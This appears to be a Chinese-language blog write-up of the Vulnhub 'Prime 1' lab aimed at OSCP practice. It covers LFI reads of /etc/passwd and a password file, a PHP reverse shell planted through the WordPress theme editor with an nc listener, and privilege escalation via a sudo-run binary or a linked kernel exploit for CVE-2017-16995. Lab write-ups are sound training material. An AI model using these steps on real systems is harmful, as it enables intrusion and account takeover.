nmap version check:
- 22/tcp OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
- 80/tcp Apache httpd 2.4.18 ((Ubuntu))
/image.php
/index.php
/secret.txt
请求某个 php 页面, 参数 secrettier360
尝试 LFI, 请求 /etc/passwd
为了显示方便, 这里只 grep 了需要的部分 请求对应的 password.txt
密码 follow_the_ippsec
ippsec? youtube 的一个安全教程相关的频道
多次尝试[1], 发现是 wordpress victor 的密码
wordpress 用户名 victor 密码 follow_the_ippsec
多次尝试[2], 在 Appearance->Theme Editor 找到一个可以写入的文件 secret.php
使用 webshells 包的 php/php-reverse-shell.php, 修改 LHOST/LPORT:
$ip = '192.168.1.90';
$port = 4444;
本地 terminal 设置 `nc -n -v -l -p 4444`
拿到 unstable limited reverse shell
victor 在 sudo 组
privilege escalation
- 破解 AES 密码, sudo 提权
- 利用内核漏洞提权
method 1:
执行 /home/saket/enc, 提示密码, 尝试几个简单的密码[3], 没有成功
目录遍历的时候, /opt/backup/server_database 找到两个奇怪的文件
{hello.8}
再次执行 /home/saket/enc, 密码 backup_password
提取出 enc.txt 和 key.txt
又是 ippsec
多次尝试, https://www.devglan.com/online-tools/aes-encryption-decryption
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
ssh 用户名 saket, 密码 tribute_to_ippsec
/home/victor/undefeated_victor 会执行 /tmp/challenge 创建 /tmp/challenge
拿到 root 权限 proof
method 2:
https://www.hackingarticles.in/prime-1-vulnhub-walkthrough/
https://www.rapid7.com/db/modules/exploit/linux/local/bpf_sign_extension_priv_esc
https://raw.githubusercontent.com/rlarabee/exploits/db64753f2335a01825f78d66665adfff3670653e/cve-2017-16995/cve-2017-16995.c
description:
This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.其实 offsec pdf/lab 都里面没有提到 AES 解密..
TODO:
1. 排版
2. footnote
No comments:
Post a Comment